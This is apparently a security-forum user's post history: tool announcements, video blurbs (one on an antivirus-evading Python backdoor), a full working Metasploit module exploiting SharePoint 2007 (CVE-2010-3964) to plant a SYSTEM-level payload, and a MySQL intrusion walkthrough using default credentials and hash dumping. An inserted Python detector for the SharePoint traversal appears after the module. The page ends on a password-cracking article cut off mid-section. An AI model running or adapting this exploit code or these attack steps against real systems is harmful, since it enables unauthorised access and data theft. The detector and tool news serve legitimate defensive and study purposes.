
Wubi
Active Members
Posts: 893
Days Won: 17

Everything posted by Wubi

  1. Description: DRIL is a simple reverse domain tool; it is really useful for penetration testers to find out the domain names which are listed on the target host. The DRIL tool was developed by Treasure Priyamal. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  2. Description: In this video you will learn step by step how to decode a malicious email attachment. Sometimes we receive a random email, click on it, and then see the malicious script automatically start sending fake messages; in this video you learn how to decode that malicious email attachment and see where the email came from. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  3. CacheToggle, Cookies Manager+, Firebug, fireencrypter, Fireforce, FireFTP, FireSSH, Flagfox, FoxyProxy Standard, Google Site Indexer, Greasemonkey, HttpFox, HttpRequester, JSView, Live HTTP headers, HackBar, Ra.2: DOM XSS Scanner, Proxy Tool, SQLite Manager, SQL Inject Me, Session Manager, Secure Or Not, XSS Me, DNS Flusher, Event Spy, NoScript, Scriptify, Web Developer, User Agent Switcher, Inspect Element, Wappalyzer, Websecurify. There are others as well. It would be an idea to also make an RST-branded theme. You could also build a proxy server that ships with the browser by default. Maybe some default bookmarks too, like RSTCenter, RTFM, P-o-S.
  4. chapcrack is a tool for parsing and decrypting MS-CHAPv2 network handshakes. In order to use it, a packet capture with an MS-CHAPv2 network handshake must be obtained. The tool is used to parse the relevant credentials from the handshake. The hash is inserted into chapcrack, and the entire network capture is decrypted. Alternatively, it can be used to log in to the user's VPN service or WPA2 Enterprise RADIUS server. Moxie Marlinspike, the mind behind the Convergence SSL authenticity system, has presented at Defcon a tool that allows attackers to crack the MS-CHAPv2 authentication protocol, which is still used in many PPTP (Point-to-Point Tunneling Protocol) VPNs and WPA2 Enterprise environments.

     Four simple steps to follow for using chapcrack:
     - Obtain a packet capture with an MS-CHAPv2 network handshake in it (PPTP VPN or WPA2 Enterprise handshake, for instance).
     - Use chapcrack to parse relevant credentials from the handshake (chapcrack parse -i path/to/capture.cap).
     - Submit the CloudCracker token to www.cloudcracker.com
     - Get your results, and decrypt the packet capture (chapcrack decrypt -i path/to/capture.cap -o output.cap -n )

     Download chapcrack: chapcrack – chapcrack.py
     Source: chapcrack a Tool for cracking MS-CHAPv2 — PenTestIT
  5. http://www.youtube.com/watch?feature=player_embedded&v=wg9BEO9oXGc Description: Findmyhash is a Python script which is used to crack hashes. With the findmyhash tool you can crack different types of hashes using free online services. Make sure you are connected to the internet before using the findmyhash tool. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Findmyhash decrypt tool on BackTrack 5 R2 - YouTube
  6. Description: You can hack a remote victim utilizing the XSS vulnerabilities of a web application. For this purpose we use the exploit "ms10_046_shortcut_icon_dllloader" available in Metasploit. The exploit will start a local server that can serve the victim the exploits. When the victim visits that URL, he gets owned. In the background, things like exploiting WebDAV, DLL injection, exploiting the LNK vulnerability etc. are happening. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  7. Description: In this video you will learn how to create an undetectable backdoor using the Python programming language. This backdoor totally avoids detection by almost every antivirus out there. To set up a Python environment watch this video: - This video is all about How to Install & Config Python Programming Environment. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  8. Microsoft Office SharePoint Server 2007 Remote Code Execution

     EDB-ID: 20122 | CVE: 2010-3964 | OSVDB-ID: 69817
     Author: metasploit | Published: 2012-07-31 | Verified:
     Exploit Code: | Vulnerable App: N/A

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  def initialize
    super(
      'Name'           => 'Microsoft Office SharePoint Server 2007 Remote Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability found in SharePoint Server 2007 SP2.
        The software contains a directory traversal, that allows a remote attacker
        to write arbitrary files to the filesystem, sending a specially crafted SOAP
        ConvertFile request to the Office Document Conversions Launcher Service,
        which results in code execution under the context of 'SYSTEM'. The module
        uses the Windows Management Instrumentation service to execute an arbitrary
        payload on vulnerable installations of SharePoint on Windows 2003 Servers.
        It has been successfully tested on Office SharePoint Server 2007 SP2 over
        Windows 2003 SP2.
      },
      'Author'         =>
        [
          'Oleksandr Mirosh', # Vulnerability Discovery and PoC
          'James Burton',     # Vulnerability analysis published at "Entomology: A Case Study of Rare and Interesting Bugs"
          'juan'              # Metasploit module
        ],
      'Platform'       => 'win',
      'References'     =>
        [
          [ 'CVE', '2010-3964' ],
          [ 'OSVDB', '69817' ],
          [ 'BID', '45264' ],
          [ 'MSB', 'MS10-104' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-287/' ]
        ],
      'Targets'        =>
        [
          [ 'Microsoft Office SharePoint Server 2007 SP2 / Microsoft Windows Server 2003 SP2', { } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => 'Dec 14 2010'
    )

    register_options(
      [
        Opt::RPORT(8082),
        OptInt.new('DEPTH', [true, "Levels to reach base directory", 7])
      ], self.class)
  end

  # Msf::Exploit::Remote::HttpClient is avoided because send_request_cgi doesn't get
  # the response maybe due to the 100 (Continue) status response even when the Expect
  # header isn't included in the request.
  def upload_file(file_name, contents)
    traversal = "..\\" * datastore['DEPTH']

    soap_convert_file = "<SOAP-ENV:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" "
    soap_convert_file << "xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" "
    soap_convert_file << "xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" "
    soap_convert_file << "xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" "
    soap_convert_file << "xmlns:clr=\"http://schemas.microsoft.com/soap/encoding/clr/1.0\" "
    soap_convert_file << "SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">" << "\x0d\x0a"
    soap_convert_file << "<SOAP-ENV:Body>" << "\x0d\x0a"
    soap_convert_file << "<i2:ConvertFile id=\"ref-1\" "
    soap_convert_file << "xmlns:i2=\"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface\">" << "\x0d\x0a"
    soap_convert_file << "<launcherUri id=\"ref-3\">http://#{rhost}:8082/HtmlTrLauncher</launcherUri>" << "\x0d\x0a"
    soap_convert_file << "<appExe id=\"ref-4\"></appExe>" << "\x0d\x0a"
    soap_convert_file << "<convertFrom id=\"ref-5\">#{traversal}#{file_name}</convertFrom>" << "\x0d\x0a"
    soap_convert_file << "<convertTo id=\"ref-6\">html</convertTo>" << "\x0d\x0a"
    soap_convert_file << "<fileBits href=\"#ref-7\"/>" << "\x0d\x0a"
    soap_convert_file << "<taskName id=\"ref-8\">brochure_to_html</taskName>" << "\x0d\x0a"
    soap_convert_file << "<configInfo id=\"ref-9\"></configInfo>" << "\x0d\x0a"
    soap_convert_file << "<timeout>20</timeout>" << "\x0d\x0a"
    soap_convert_file << "<fReturnFileBits>true</fReturnFileBits>" << "\x0d\x0a"
    soap_convert_file << "</i2:ConvertFile>" << "\x0d\x0a"
    soap_convert_file << "<SOAP-ENC:Array id=\"ref-7\" xsi:type=\"SOAP-ENC:base64\">#{Rex::Text.encode_base64(contents)}</SOAP-ENC:Array>" << "\x0d\x0a"
    soap_convert_file << "</SOAP-ENV:Body>" << "\x0d\x0a"
    soap_convert_file << "</SOAP-ENV:Envelope>" << "\x0d\x0a"

    http_request = "POST /HtmlTrLauncher HTTP/1.1" << "\x0d\x0a"
    http_request << "User-Agent: Mozilla/4.0+(compatible; MSIE 6.0; Windows 5.2.3790.131072; MS .NET Remoting; MS .NET CLR 2.0.50727.42 )" << "\x0d\x0a"
    http_request << "Content-Type: text/xml; charset=\"utf-8\"" << "\x0d\x0a"
    http_request << "SOAPAction: \"http://schemas.microsoft.com/clr/nsassem/Microsoft.HtmlTrans.IDocumentConversionsLauncher/Microsoft.HtmlTrans.Interface#ConvertFile\"" << "\x0d\x0a"
    http_request << "Host: #{rhost}:#{rport}" << "\x0d\x0a"
    http_request << "Content-Length: #{soap_convert_file.length}" << "\x0d\x0a"
    http_request << "Connection: Keep-Alive" << "\x0d\x0a\x0d\x0a"

    connect
    sock.put(http_request << soap_convert_file)

    # Read the response in chunks until the socket yields nothing more
    data = ""
    read_data = sock.get_once(-1, 1)
    while not read_data.nil?
      data << read_data
      read_data = sock.get_once(-1, 1)
    end
    disconnect

    return data
  end

  # The check tries to create a test file in the root
  def check
    peer = "#{rhost}:#{rport}"
    filename = rand_text_alpha(rand(10)+5) + '.txt'
    contents = rand_text_alpha(rand(10)+5)

    print_status("#{peer} - Sending HTTP ConvertFile Request to upload the test file #{filename}")
    res = upload_file(filename, contents)

    if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/
      return Exploit::CheckCode::Vulnerable
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    peer = "#{rhost}:#{rport}"

    # Setup the necessary files to do the wbemexec trick
    exe_name = rand_text_alpha(rand(10)+5) + '.exe'
    exe = generate_payload_exe
    mof_name = rand_text_alpha(rand(10)+5) + '.mof'
    mof = generate_mof(mof_name, exe_name)

    print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}")
    res = upload_file("WINDOWS\\system32\\#{exe_name}", exe)

    if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/
      print_good("#{peer} - #{exe_name} uploaded successfully")
    else
      print_error("#{peer} - Failed to upload #{exe_name}")
      return
    end

    print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}")
    res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)

    if res and res =~ /200 OK/ and res =~ /ConvertFileResponse/ and res =~ /<m_ce>CE_OTHER<\/m_ce>/
      print_good("#{peer} - #{mof_name} uploaded successfully")
    else
      print_error("#{peer} - Failed to upload #{mof_name}")
      return
    end
  end
end
```
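A detection-side companion to the module above, added here and not part of the original post or of the Metasploit module: it inspects raw HTTP requests (as a proxy log or packet capture would deliver them) and flags POSTs to the HtmlTrLauncher service whose convertFrom element carries "..\" segments, the traversal the module relies on. The endpoint path and SOAP element names come from the module; the host name, client IPs and request bodies are constructed samples.

```python
"""Flag SharePoint 2007 ConvertFile requests that use path traversal (CVE-2010-3964).

Added example, not part of the original post or of the Metasploit module above.
The sample requests at the bottom are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Endpoint and SOAP element names as they appear in the module above.
LAUNCHER_PATH = "/HtmlTrLauncher"
CONVERT_FROM_RE = re.compile(r"<convertFrom[^>]*>(.*?)</convertFrom>", re.S)
# Any "..\" or "../" segment in convertFrom escapes the conversion directory.
TRAVERSAL_RE = re.compile(r"\.\.[\\/]")


@dataclass
class Finding:
    source: str        # where the request came from (client IP in a log)
    convert_from: str  # the raw convertFrom value
    depth: int         # number of "..\" segments (the module's DEPTH option)
    target: str        # path that would be written once traversal is stripped


def parse_request(raw: str) -> Tuple[str, dict, str]:
    """Split a raw HTTP request into (request line, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect_request(source: str, raw: str) -> Optional[Finding]:
    """Return a Finding if the request is a traversal ConvertFile upload, else None."""
    request_line, _headers, body = parse_request(raw)
    parts = request_line.split(" ")
    if len(parts) < 2 or parts[0] != "POST" or parts[1] != LAUNCHER_PATH:
        return None
    match = CONVERT_FROM_RE.search(body)
    if match is None:
        return None
    convert_from = match.group(1)
    segments = TRAVERSAL_RE.findall(convert_from)
    if not segments:
        return None  # an ordinary conversion request, nothing to report
    return Finding(source, convert_from, len(segments), TRAVERSAL_RE.sub("", convert_from))


def scan(requests: List[Tuple[str, str]]) -> List[Finding]:
    """Run inspect_request over (source, raw_request) pairs and collect findings."""
    findings = []
    for source, raw in requests:
        finding = inspect_request(source, raw)
        if finding is not None:
            findings.append(finding)
    return findings


def make_request(convert_from: str) -> str:
    """Build a minimal ConvertFile POST for the samples (constructed, abridged SOAP)."""
    body = (
        "<SOAP-ENV:Envelope><SOAP-ENV:Body><i2:ConvertFile id=\"ref-1\">\r\n"
        f"<convertFrom id=\"ref-5\">{convert_from}</convertFrom>\r\n"
        "<convertTo id=\"ref-6\">html</convertTo>\r\n"
        "</i2:ConvertFile></SOAP-ENV:Body></SOAP-ENV:Envelope>\r\n"
    )
    return (
        f"POST {LAUNCHER_PATH} HTTP/1.1\r\n"
        "Host: sharepoint.example.internal:8082\r\n"   # constructed host name
        "Content-Type: text/xml; charset=\"utf-8\"\r\n"
        f"Content-Length: {len(body)}\r\n\r\n" + body
    )


# Constructed samples: one ordinary conversion, one traversal into system32.
SAMPLE_REQUESTS = [
    ("10.0.0.5", make_request("brochure.docx")),
    ("10.0.0.9", make_request("..\\" * 7 + "WINDOWS\\system32\\dropped.exe")),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(f"{finding.source}: traversal depth {finding.depth} -> {finding.target}")
```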
  9. You're largely right, but as a pentester you can't let trivial things like this slip by, whether the services you provide are for a company that respects itself or not. The aim of the tutorial was to show the simplest method of gaining access to a MySQL server. It may not be very technical, and I didn't go into much detail, but that wasn't the goal. Thanks for the suggestion; I'll make much more detailed tutorials in which I explain at length what I did, how, and why I did it that way. Thanks also for the heads-up about the image.
  10. MySQL is one of the most widely used databases, used by a great many applications nowadays. In pentesting, it is almost impossible not to come across a system running a MySQL server. In this topic we will see how to attack a MySQL database with the help of the Metasploit framework. Let's assume our goal is to test the MySQL server. The first step is to discover the database version. The Metasploit framework has a module that lets us find the version of a database. Knowing the version will help us discover possible vulnerabilities. The only thing we have to do is set the IP address and use the run command. Now we can use the mysql_login module together with our wordlist to discover at least one valid account that will let us connect to the MySQL database. As a pentester it is always good to check the database for weak accounts or passwords. The scanner produced results; as we can see from the output, we have a valid account (root). Before using this account to connect to and interact directly with the database, we can use two other Metasploit modules that help us enumerate the accounts in the database and extract the account and encrypted password from the MySQL server. Of course, this can be done manually, but Metasploit helps us do it. So first we configure the module called mysql_enum to find information about the database accounts. The next step is to configure and run the mysql_hashdump module to extract the password hashes of all accounts in the database. Now we can connect to the MySQL server. BackTrack already has a client, so we can use the command mysql -h IP -u username -ppassword. In our case the target IP is my own IP. It is blurred in the images, as is the MySQL password.

      Now that we are connected to the database we can use the command show databases; to discover the databases stored on the MySQL server. The next step is to choose a database and then try to see the tables from which we will start extracting data. We can do this using the command use <dbname>; and the command show tables; We can see that there is a table named 'user'. We want to extract the data containing the system accounts and passwords. We can do this using the command select User, Password from user; As we can see there are 5 accounts with encrypted passwords. So now we have all the accounts of the MySQL database. We can now discover additional tables in other databases with the command show tables from <dbname>; Such methods are used to extract all kinds of databases.

      Conclusion: In this topic I showed how to get access to a MySQL server by using weak or default usernames and passwords. Many companies have such security problems. Every pentester must check, before evaluating a database system, whether it uses weak or default passwords. This is the easiest way to gain access.

      References: Penetration Testing Lab; Metasploit Penetration Testing Software | Metasploit Framework | Metasploit Project; BackTrack Linux - Penetration Testing Distribution
  11. Wow! This sure has taken us by surprise! We thought Pentoo was long dead, but it has proved us wrong and has literally risen from the ashes! We now have a 64-bit Pentoo 2012.0 Defcon Release amongst us (see also our very initial posting about Pentoo).

      Changes made to Pentoo:
      - New “pentoo” profiles which allow you to use hardened or not at your choice (who wants to be soft?)
      - Full GPU cracking support for both CUDA and OpenCL on both AMD/ATI and nVIDIA hardware, including but not limited to pyrit, JohnTheRipper, oclhashcat-plus, oclhashcat-lite
      - Shiny 3.4.2 kernel (hardened or not)
      - Full support for the ubertooth hardware (also added to kismet and wireshark)
      - New radio category for SDR hacking, for things like the rtl-sdr and Ettus USRP devices
      - 64-bit version (32-bit is a low priority until after the beta starts, sorry if your hardware is that old/crappy)

      Again, this is the short list of changes. The real changelog and planned features are mostly hiding in over 3000 commits in their SVN. Things which we can look forward to in the forthcoming releases are full ARM support and OpenBTS! But, as of now, we only have a 64-bit release! Should BackTrack watch out? Only time will tell.

      Download Pentoo: Pentoo 2012.0 Defcon Beta - pentoo-x86_64-2012.0_betazero.iso
      Source: Pentoo 2012.0 Defcon Beta! — PenTestIT
  12. Diviner comes to us from the author of the recently released Security Tools Benchmark, Shay Chen, and helps you gain insight into the server-side source code and memory structure of any application, using black-box techniques and without relying on any security exposures! It tries to introduce a crossbreed between automated testing and human deduction, and to provide an alternate (or complementary) route via techniques such as source code fingerprinting, memory structure divination and cross entry-point effects. Diviner is an open source, active information gathering platform, built as an extension for OWASP Zed Attack Proxy (ZAP), and aimed at enhancing the tester's decision making process. It is a unique platform that attempts to predict the structure of the server-side memory, source code and processes by executing scenarios aimed at fingerprinting behaviors that derive from specific lines of code, processes or memory allocations, by employing a variety of coverage processes, content differentiation tests and entry point execution scenarios, and by using deduction algorithms that convert this information into a visual map of the application. This information is also presented in the form of leads that can help testers locate complex vulnerabilities, the same way they locate vulnerabilities that are considered low hanging fruit.

      Features offered by Diviner:
      Analysis Features:
      - Detect Input Reflections (Potential XSS, CRLF Injection, Etc)
      - Detect Error-Generating Scenarios (Potential Injections)
      - Detect Content Differentiation Effects (Direct & Indirect Effect of Input)
      Coverage Features:
      - Reuse the Content in ZAP's History
      - Domain Restrictions
      - URL Exclusion
      Deduction Processes:
      - Convert Behaviors into Pseudo-code Representation of Server-Side Code
      - Predict the Structure of the Server Side Memory (Session / DB / Etc)
      - Isolate and Present a Map of the Server-Side Processes
      - Specific Payload Recommendations
      Barrier Support:
      - Authentication Support
      - Anti-CSRF Token Support
      - Resend Updated Values of Required Parameters (VIEWSTATE, Etc)
      - Replay Relevant History Prior To Resending Requests
      Built-in Plugins:
      - A Customized Manual Penetration Test Payload Manager
      Integration Features:
      - Integration With ZAP's 'Resend Request' Feature

      Diviner can already illustrate server side behaviors and processes, contains features such as the task list/advisor which provide invaluable leads to potential exposures, presents a partial map of the server side memory, and presents a partial representation of the server side code. Since Diviner attempts to identify behaviors that result from valid & invalid scenarios, and can't guess what is valid on its own, it must be used after a short manual crawling process that covers the important application sections with valid values. Clearly, the ZAP extension does not perform any form of automated vulnerability scanning, but plans on exporting the interesting leads to a format that can be used by external scanners to detect exposures in these abnormal scenarios are in the works. The Diviner extension is deployed using a Windows installer (or in binary format for other operating systems), and requires Java 1.7.x and OWASP ZAP 1.4.0.1 in order to run properly.

      Download Diviner: Diviner v1.0.1 – Diviner-v1.0.1beta.exe/diviner-1.0.1beta-src.zip
      Source: PenTestIT — Your source for Information Security Related information!
  13. http://www.youtube.com/watch?feature=player_embedded&v=bFb5opZZpkk Description: Cupp is a common user password profiler. Using this script we can make our own dictionary by profiling someone, using details such as a birthday, nickname, address, the name of a pet or relative, some common words like god, love, money, or any other passwords. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Cupp wordlist maker tool on BackTrack 5 R2 - YouTube
  14. Xelenium is a solution developed using the Selenium APIs that helps us identify the fields in a web application that are vulnerable to reflected XSS (cross site scripting). This solution is developed using Java Swing and thread concepts, and it is flexible in that the user can customize the attack vectors used against the application. What is Xelenium? Xelenium is a security testing tool that can be used to identify the security vulnerabilities present in a web application. Xelenium uses the open source functional test automation tool 'Selenium' as its engine and has been built using Java Swing. Xelenium has been designed so that it needs very few inputs from users in the process of discovering bugs. The current version helps the user identify the Cross Site Scripting (XSS) threats present in the web application. In subsequent versions, Xelenium will be enhanced so that it can identify the other leading threats. There are some issues while running the tool, and we hope the author is aware of them. Hopefully they will be fixed soon.

      Download Xelenium: Xelenium – Xelenium.jar
      Source: Xelenium a Security Testing with Selenium — PenTestIT
  15. Description: This and more videos in: Blog de Omar. Follow me on Facebook: El Palomo | Facebook. Follow me on Twitter: @ElPalomo_Blog. This video shows: analysis of configuration files (XML files); analysis of BD files (message history, transferred files, list of contacts); conclusions and recommendations. Spanish video version: Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source:
  16. Cuckoo eats Win32.FakeAV. Description: In this video you will learn how to analyze fake antivirus software using a sandbox tool, and how attackers sell their fake software and steal our information for profit. In this video he is using a tool called Cuckoo Sandbox. Cuckoo is an open source automated malware analysis system. Cuckoo generates a handful of different raw data which include:
      - Native functions and Windows API call traces
      - Copies of files created and deleted from the file system
      - Dump of the memory of the selected process
      - Screenshots of the desktop during the execution of the malware analysis
      - Network dump generated by the machine used for the analysis
      Source: - Automated Malware Analysis | Cuckoo Sandbox. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Cuckoo eats Win32.FakeAV on Vimeo
  17. Cuckoo Sandbox 0.4 against a Flash Player exploit. Description: In this video demo Claudio G. analyzes a rogue PDF document exploiting a Flash Player vulnerability (CVE-2011-0611). In this video he is using a tool called Cuckoo Sandbox. Cuckoo is an open source automated malware analysis system. Cuckoo generates a handful of different raw data which include:
      - Native functions and Windows API call traces
      - Copies of files created and deleted from the filesystem
      - Dump of the memory of the selected process
      - Screenshots of the desktop during the execution of the malware analysis
      - Network dump generated by the machine used for the analysis
      Source: - Automated Malware Analysis | Cuckoo Sandbox. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Cuckoo Sandbox 0.4 against a Flash Player exploit on Vimeo
  18. http://www.youtube.com/watch?v=TU9dfLCuu6U&feature=player_embedded Description: WhatWeb identifies websites. Its goal is to answer the question, “What is that Website?”. WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 900 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Whatweb tool on BackTrack 5 R2 - YouTube
  19. Post BlackHat USA, a lot of new tools that we were waiting for were finally released! First in line is the Smartphone Pentest Framework by Ms. Georgia Weidman! This open source tool was built out of the need for a way to test the security of the frighteningly workplace-intrusive smartphones that have unique attack vectors currently not covered by available industry tools. Mind you, this is not like just running Nmap from your smartphone. So, the Smartphone Pentest Framework (SPF) is an open source tool designed to allow users to assess the security posture of the smartphones deployed in an environment, and is a product of a DARPA Cyber Fast Track grant. SPF allows you to understand the security posture of the smartphones in an organization just as we would in a normal penetration test: gather information/social engineering, launch exploits and maintain control post exploitation. The current Smartphone Pentest Framework contains remote attacks (via HTTP or SMS), client side attacks (via malicious webpages, PDFs etc.), social engineering attacks, and post exploitation, targeting smartphone devices.

      Smartphone Pentest Framework includes the following:
      - SPF Console: The console is a text based Perl program that allows Smartphone Pentest Framework users to perform all the server functionality of SPF.
      - SPF Web based GUI: The GUI is a web based front end for SPF that allows users to perform all the server functionality. It is a set of Perl based webpages.
      - SPF Android App: The SPF Android App allows users to use the mobile modem of the Android smartphone with SPF to send SMS messages, gather information, etc. Users can also perform server functionality directly from Android smartphones using this application.
      - SPF Android Agent: The SPF Android Agent is one of Smartphone Pentest Framework's post exploitation options. It is transparent to the user and allows SPF users to perform post exploitation tasks such as privilege escalation, information gathering, and remote control on Android phones with the agent installed. Agents for iPhone and Blackberry platforms are currently in development.

      The above components may be mixed and matched to meet users' needs, making this framework very versatile. Prerequisites for the Smartphone Pentest Framework (though very few) are: a web server, a MySQL database, Perl with the packages Bundle::Expect & DBD::MYSQL, and an Android phone.

      Download the Smartphone Pentest Framework – SPF v0.1
      Source: Smartphone Pentest Framework (SPF)! — PenTestIT
  20. Our first post regarding Smooth-Sec can be found here. A few hours ago an update for the 64-bit Smooth-Sec version 2.0 was released! This new version brings substantial improvements in terms of performance with the adoption of the 64-bit Debian GNU/Linux operating system.

      Smooth-Sec 64-bit official change log:
      - Operating system: Debian 6.0 squeeze 64-bit
      - IDS: Suricata 1.3 stable
      - Web console: Snorby 2.5.1
      - Database: MariaDB 5.5.25
      - Log interpreter: Barnyard2 2.1.10-beta2
      - Web framework: nginx/0.8.54 – passenger-3.0.4

      Download Smooth-Sec: Smooth-Sec 2.0 64-bit – SmoothSec-2.0-amd64.iso
      Source: Smooth-Sec 64-bit version 2.0! — PenTestIT
  21. Cucusoft Net Guard is free software to monitor your broadband usage, speed up your Internet connection, kill malware that is wasting your bandwidth, and provide you with a detailed monthly bandwidth usage report. On the market, this kind of software is sold for $30 or more and often has fewer features. But this one is free right now, so grab it!!! Cucusoft Net Guard includes a powerful bandwidth monitor and bandwidth meter to help you find who is wasting your bandwidth. As you know, sometimes you are not browsing the internet, but there is still some unknown software using your broadband on your computer. Normally you have no idea about it: you don't know what it is, how to monitor it, or how to kill the useless program that is eating your bandwidth. Those unknown programs sometimes even affect your normal Internet surfing speed a lot, and you have to pay the broadband bill for them. Cucusoft Net Guard can help you fix these problems. It makes it easy to monitor your broadband status, find who is using your broadband and how much bandwidth they are using, with more detailed statistics available; after checking the simple report you can decide for yourself whether to keep it or kill it.

      Cucusoft Net Guard's five tabs:
      - Cucusoft Net Guard displays the bandwidth usage over time, as well as how much of a month's bandwidth limit you have already used up. You can define Internet limits in the program settings. The graph can display bandwidth usage by week, month or year.
      - Monitor displays all processes and services that are or have been using the Internet connection in one way or another. Each program is listed with its name, the current upload and download speed, as well as the traffic it has accumulated in the current session. A right-click on a program displays options to kill the process directly.
      - Connections displays a list of ports that are currently open on the computer.
      - Speed test runs a benchmark that is used to determine the computer's download speed. It is fairly limited in comparison to other services such as Speed Test, Down Tester, Internet Auto Speed Tester or Speed.io.
      - Statement displays a computer's bandwidth usage in a PDF report.

      Download Cucusoft Net Guard: Cucusoft Net Guard – netguard.exe
      Source: Cucusoft Net Guard is a monitor broadband usage easily. — PenTestIT
  22. Update: Two new themes have been released, PoS and Wubi. The themes are Vista-like. You can find them in Start > System Preferences (Control Panel for new users) > Looks & Feel > Theme. These have been made public, but will still undergo changes. Preview Wubi: Preview PoS: Update2: The RST Radio application has been redone.
  23. Will VictorPonta.ro be next?
  24. Brute Force Attacks: Beyond password basics | ZDNet

Summary: So you have a strong password. Is that enough? The psychology of password creation would suggest we are not necessarily safe from Brute Force Attacks.

By Gery Menegaz for Five Nines: The Next Gen Datacenter | July 27, 2012 -- 19:22 GMT (12:22 PDT)

“Heuristic brute forcing provides hackers with the ability to crack long and complicated passwords using brute force style password cracking, while not wasting eons trying unrealistic passwords”, according to Brandon Smith, writing as James Penguin for 2600.

Many of us know the basics, or what passes for common sense with regard to workstation security. You know… use anti-virus software, and make certain that the definitions file is up to date. Make certain that your OS is equally patched. Don’t download software from questionable sites. With regard to passwords, it’s simple: don’t use passwords that may be found in a dictionary. Enterprises, and more security-conscious web sites, implement password policies that mandate the use of numbers, letters and, sometimes, special characters. Is this enough?

With the recent publication of hundreds of thousands of usernames and associated passwords, it appears that common sense is, in fact, not very common. The recent Yahoo! Email hack revealed that ‘123456’ was used as the password for 1,666 users. Believe it or not, ‘password’ was used by 780 users. Please!

Once hackers are able to infiltrate a site, they make their way to the list of usernames and passwords, a file that is typically encrypted or ‘hashed’ using MD5 (Message-Digest Algorithm, a widely used cryptographic hash function). Hackers will then try to generate hashes through brute force, and compare the data from the stolen file to the newly created hash file. This is how, after a breach, they are able to post all of the passwords online.

A quick distinction: a Dictionary Attack is where a hacker will use a dictionary file to iterate through every possible word to produce a hash file, which can then be compared to the target hash. Dictionary files can be downloaded from a number of places such as the Pirate Bay, so it’s something that script kiddies can use. A dictionary attack works well on single-word passwords, but fails on more complex passwords such as those required in most mature organizations.

Brute force attacks are different in that they will cycle through every possible combination of characters (e.g., aaaaaaa, aaaaaab, aaaaaac, aaaaaad, etc.), rather than employing a dictionary list. While very effective, given enough time, brute force attacks will typically waste a lot of cycles trying to crack a hash from nonsense letter combinations like: ddddddd, jhakdsj, asdasda.

  Number of Letters   Possible Combinations
  1                   26
  2                   1,352
  3                   52,728
  4                   1,827,904
  5                   59,406,880
  6                   1,853,494,656
  7                   56,222,671,232

Passwords that resemble line noise are only generated by the most paranoid of users. Most people will generate words or phrases that they can easily remember. This means that they will follow some basic word construction rules in the creation of their password/passphrase. For example, how many of you:

  - use English-like words or word combinations?
  - use hyphens and underscores between words?
  - use ending punctuation, appropriately, at the end of a password or passphrase?
  - replace vowels with numbers such as 4 = A, 3 = E, 0 = O, etc.?

By understanding some basic morphology, hackers have the ability to move beyond basic brute force attacks and employ smarter algorithms. Considerations include the use of apostrophes, hyphens, underscores, suffixes, vowels, and character repetition patterns, according to Smith.

Apostrophe Use
Here we are expecting one apostrophe followed by an ‘s’, positioned at the last or second-to-last character. For the algorithm we are not concerned with the apostrophe to show a contraction, only possession and plural possession.

Hyphens and Underscores
The rule here is that these are used independently for the separation of two unique constructions; then each word is tested separately.

Ending Punctuation
